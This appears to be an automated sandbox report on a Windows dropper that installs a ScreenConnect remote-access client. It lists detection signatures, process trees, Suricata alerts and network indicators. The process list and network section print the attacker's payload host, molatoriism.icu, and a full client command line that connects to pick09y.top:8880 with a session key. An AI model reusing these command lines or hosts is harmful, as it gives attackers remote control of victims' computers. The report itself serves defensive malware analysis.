Windows Analysis Report
pzPO97QouM.exe

Overview

General Information

Sample name: pzPO97QouM.exe (renamed because original name is a hash value)
Original sample name: fe9cb4c7eaa00078639484c209a3acf1d5195cbec55bd7981e733fb179bea899.exe
Analysis ID: 1551436
MD5: 47891cf8a43a19e066fe70e812982c98
SHA1: b2a6e75ade18f10e2d0cd709630f5e551dbcefae
SHA256: fe9cb4c7eaa00078639484c209a3acf1d5195cbec55bd7981e733fb179bea899

Detection

ScreenConnect Tool
Score: 60
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Compliance

Score: 33
Range: 0 - 100

Signatures

Antivirus detection for URL or domain
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Creates files in the system32 config directory
Detected potential unwanted application
Enables network access during safeboot for specific services
Reads the Security eventlog
Reads the System eventlog
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
One or more processes crash
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • pzPO97QouM.exe (PID: 5856 cmdline: "C:\Users\user\Desktop\pzPO97QouM.exe" MD5: 47891CF8A43A19E066FE70E812982C98)
    • dfsvc.exe (PID: 7120 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe" MD5: B4088F44B80D363902E11F897A7BAC09)
      • ScreenConnect.WindowsClient.exe (PID: 4140 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe" MD5: 20AB8141D958A58AADE5E78671A719BF)
        • ScreenConnect.ClientService.exe (PID: 3652 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=BgIAAACkAABSU0ExAAgAAAEAAQDdgAKam2Sc4a%2b0vjsNximnzOEX5MKRna0gdqvTZFUYhUi4mxfaIer02WcIARvbkQtcBocnZY6cOhwLXqtjbXCHK5V9NClpcJ0VsmVQ5Ngzm5KWTJOIRLp48Nx7xw8h5tMlI69ZhW7bDoTif1%2bzod8%2bP9ttRfgxJhBbSeiBlGI17JX%2ffgLdQYfBxWOvwJYUSFApm2B6yeRofjh%2b%2fClLGayEdlBZ3CJwK2rKMq6rxdojaIGyxzfrBIlRifETmHax7zLC%2fb3uiIEpoX2rWmOZFQlj%2bubOBd89yKN0uBh3aLVd%2b8orlqSpyEBCOK4rG%2fOuOyVEiCOkqxdA0LWuzW70luvi&r=&i=Untitled%20Session" "1" MD5: 361BCC2CB78C75DD6F583AF81834E447)
    • WerFault.exe (PID: 6416 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5856 -s 316 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 2920 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • ScreenConnect.ClientService.exe (PID: 1396 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=BgIAAACkAABSU0ExAAgAAAEAAQDdgAKam2Sc4a%2b0vjsNximnzOEX5MKRna0gdqvTZFUYhUi4mxfaIer02WcIARvbkQtcBocnZY6cOhwLXqtjbXCHK5V9NClpcJ0VsmVQ5Ngzm5KWTJOIRLp48Nx7xw8h5tMlI69ZhW7bDoTif1%2bzod8%2bP9ttRfgxJhBbSeiBlGI17JX%2ffgLdQYfBxWOvwJYUSFApm2B6yeRofjh%2b%2fClLGayEdlBZ3CJwK2rKMq6rxdojaIGyxzfrBIlRifETmHax7zLC%2fb3uiIEpoX2rWmOZFQlj%2bubOBd89yKN0uBh3aLVd%2b8orlqSpyEBCOK4rG%2fOuOyVEiCOkqxdA0LWuzW70luvi&r=&i=Untitled%20Session" "1" MD5: 361BCC2CB78C75DD6F583AF81834E447)
    • ScreenConnect.WindowsClient.exe (PID: 4072 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe" "RunRole" "7c199985-91b6-43e6-a992-7121e466b299" "User" MD5: 20AB8141D958A58AADE5E78671A719BF)
    • ScreenConnect.WindowsClient.exe (PID: 1372 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe" "RunRole" "7595e846-2dc4-4314-8d6a-fc819222a16f" "System" MD5: 20AB8141D958A58AADE5E78671A719BF)
  • svchost.exe (PID: 2468 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 3648 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5856 -ip 5856 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 2848 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

Source | Rule | Description | Author | Strings
00000005.00000000.2453484007.0000000000DD2000.00000002.00000001.01000000.0000000B.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000001.00000002.3886946834.000002350032E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000005.00000002.2472709033.0000000003190000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
Process Memory Space: dfsvc.exe PID: 7120 | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
Process Memory Space: ScreenConnect.WindowsClient.exe PID: 4140 | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

Source | Rule | Description | Author | Strings
5.0.ScreenConnect.WindowsClient.exe.dd0000.0.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

                  System Summary

                  Source: Network Connection, Author: Nasreddine Bencherchali (Nextron Systems), Data: DestinationIp: 192.168.2.5, DestinationIsIpv6: false, DestinationPort: 49705, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Initiated: true, ProcessId: 7120, Protocol: tcp, SourceIp: 172.67.182.214, SourceIsIpv6: false, SourcePort: 443
                  Source: Process started, Author: vburov, Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2920, ProcessName: svchost.exe

                  Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                  2024-11-07T18:04:28.554147+0100 | 2022930 | 1 | A Network Trojan was detected | 52.149.20.212 | 443 | 192.168.2.5 | 49715 | TCP
                  2024-11-07T18:05:06.383877+0100 | 2022930 | 1 | A Network Trojan was detected | 52.149.20.212 | 443 | 192.168.2.5 | 49897 | TCP

                  Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                  2024-11-07T18:04:28.988102+0100 | 2009897 | 1 | A Network Trojan was detected | 172.67.182.214 | 443 | 192.168.2.5 | 49717 | TCP
                  2024-11-07T18:04:30.684682+0100 | 2009897 | 1 | A Network Trojan was detected | 172.67.182.214 | 443 | 192.168.2.5 | 49721 | TCP
                  2024-11-07T18:04:35.946315+0100 | 2009897 | 1 | A Network Trojan was detected | 172.67.182.214 | 443 | 192.168.2.5 | 49742 | TCP
                  2024-11-07T18:04:37.828214+0100 | 2009897 | 1 | A Network Trojan was detected | 172.67.182.214 | 443 | 192.168.2.5 | 49747 | TCP
                  2024-11-07T18:04:40.463486+0100 | 2009897 | 1 | A Network Trojan was detected | 172.67.182.214 | 443 | 192.168.2.5 | 49757 | TCP
                  2024-11-07T18:04:42.302808+0100 | 2009897 | 1 | A Network Trojan was detected | 172.67.182.214 | 443 | 192.168.2.5 | 49764 | TCP
                  2024-11-07T18:04:48.101543+0100 | 2009897 | 1 | A Network Trojan was detected | 172.67.182.214 | 443 | 192.168.2.5 | 49795 | TCP
                  2024-11-07T18:04:50.623445+0100 | 2009897 | 1 | A Network Trojan was detected | 172.67.182.214 | 443 | 192.168.2.5 | 49808 | TCP


                  AV Detection

                  Source: Submitted Sample, Integrated Neural Analysis Model: Matched 87.1% probability
                  Source: C:\Users\user\Desktop\pzPO97QouM.exe, Code function: 0_2_00F51000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00F51000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, EXE: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, EXE: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, EXE: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, EXE: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe

                  Compliance

                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, EXE: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, EXE: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, EXE: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, EXE: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe
                  Source: pzPO97QouM.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: pzPO97QouM.exe, Static PE information: certificate valid
                  Source: unknown, HTTPS traffic detected: 172.67.182.214:443 -> 192.168.2.5:49705 version: TLS 1.2
                  Source: pzPO97QouM.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000001.00000002.3886946834.00000235004AF000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.000002350023B000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000005.00000002.2472594862.0000000002F22000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: pzPO97QouM.exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.3886946834.0000023500237000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.000002350075D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.00000235004AF000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000006.00000002.2462747546.0000000004A12000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.3888780873.0000000002281000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000E.00000002.2529477567.00000000009B0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000E.00000002.2529707032.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000005.00000000.2453484007.0000000000DD2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000006.00000000.2458689321.000000000008D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.3886946834.00000235004AF000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.000002350060E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.0000023500253000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000005.00000002.2474166019.000000001C012000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000005.00000000.2453484007.0000000000DD2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: dfsvc.exe, 00000001.00000002.3886946834.00000235004AF000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.000002350060E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.0000023500253000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000005.00000002.2474166019.000000001C012000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.3886946834.00000235004AF000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.000002350023B000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000005.00000002.2472594862.0000000002F22000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.3886946834.0000023500081000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.00000235004AF000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000006.00000002.2462868370.0000000004AC2000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr
                  Source: C:\Users\user\Desktop\pzPO97QouM.exe, Code function: 0_2_00F54A4B FindFirstFileExA,0_2_00F54A4B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe, File opened: C:\Users\user\AppData\Local\Apps\2.0\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe, File opened: C:\Users\user\AppData\Local\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe, File opened: C:\Users\user\AppData\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe, File opened: C:\Users\user\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe, File opened: C:\Users\user\AppData\Local\Apps\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe, File opened: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\

                  Networking

                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe, Registry value created: NULL Service
                  Source: global traffic, TCP traffic: 192.168.2.5:49848 -> 62.182.85.100:8880
                  Source: global traffic, HTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=BgIAAACkAABSU0ExAAgAAAEAAQDdgAKam2Sc4a%2b0vjsNximnzOEX5MKRna0gdqvTZFUYhUi4mxfaIer02WcIARvbkQtcBocnZY6cOhwLXqtjbXCHK5V9NClpcJ0VsmVQ5Ngzm5KWTJOIRLp48Nx7xw8h5tMlI69ZhW7bDoTif1%2bzod8%2bP9ttRfgxJhBbSeiBlGI17JX%2ffgLdQYfBxWOvwJYUSFApm2B6yeRofjh%2b%2fClLGayEdlBZ3CJwK2rKMq6rxdojaIGyxzfrBIlRifETmHax7zLC%2fb3uiIEpoX2rWmOZFQlj%2bubOBd89yKN0uBh3aLVd%2b8orlqSpyEBCOK4rG%2fOuOyVEiCOkqxdA0LWuzW70luvi&r=&i=Untitled%20Session HTTP/1.1, Host: molatoriism.icu, Accept-Encoding: gzip, Connection: Keep-Alive
                  Source: global traffic, HTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1, Host: molatoriism.icu, Accept-Encoding: gzip
                  Source: global traffic, HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1, Host: molatoriism.icu, Accept-Encoding: gzip
                  Source: global traffic, HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1, Host: molatoriism.icu, Accept-Encoding: gzip
                  Source: global traffic, HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1, Host: molatoriism.icu, Accept-Encoding: gzip
                  Source: global traffic, HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1, Host: molatoriism.icu, Accept-Encoding: gzip
                  Source: global traffic, HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1, Host: molatoriism.icu, Accept-Encoding: gzip
                  Source: global traffic, HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1, Host: molatoriism.icu, Accept-Encoding: gzip
                  Source: global traffic, HTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1, Host: molatoriism.icu, Accept-Encoding: gzip
                  Source: global traffic, HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1, Host: molatoriism.icu, Accept-Encoding: gzip
                  Source: global traffic, HTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1, Host: molatoriism.icu, Accept-Encoding: gzip
                  Source: global traffic, HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1, Host: molatoriism.icu, Accept-Encoding: gzip
                  Source: global traffic, HTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1, Host: molatoriism.icu, Accept-Encoding: gzip
                  Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Network traffic, Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.5:49715
                  Source: Network traffic, Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 172.67.182.214:443 -> 192.168.2.5:49721
                  Source: Network traffic, Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 172.67.182.214:443 -> 192.168.2.5:49742
                  Source: Network traffic, Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 172.67.182.214:443 -> 192.168.2.5:49717
                  Source: Network traffic, Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 172.67.182.214:443 -> 192.168.2.5:49757
                  Source: Network traffic, Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 172.67.182.214:443 -> 192.168.2.5:49747
                  Source: Network traffic, Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 172.67.182.214:443 -> 192.168.2.5:49795
                  Source: Network traffic, Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 172.67.182.214:443 -> 192.168.2.5:49764
                  Source: Network traffic, Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 172.67.182.214:443 -> 192.168.2.5:49808
                  Source: Network traffic, Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.5:49897
                  Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficDNS traffic detected: DNS query: molatoriism.icu
                  Source: global trafficDNS traffic detected: DNS query: pick09y.top
                  Source: svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srf
                  Source: svchost.exe, 0000000D.00000003.2502094568.000001D224B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502139880.000001D224B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srf.srf
                  Source: svchost.exe, 0000000D.00000002.3887186855.000001D2242D4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srf
                  Source: svchost.exe, 0000000D.00000002.3887186855.000001D2242D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srf$
                  Source: svchost.exe, 0000000D.00000003.2502094568.000001D224B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502139880.000001D224B40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/didtou.srf
                  Source: svchost.exe, 0000000D.00000003.2502094568.000001D224B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502139880.000001D224B40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getrealminfo.srf
                  Source: svchost.exe, 0000000D.00000003.2502094568.000001D224B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502139880.000001D224B40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getuserrealm.srf
                  Source: svchost.exe, 0000000D.00000003.2502328594.000001D224B56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsec
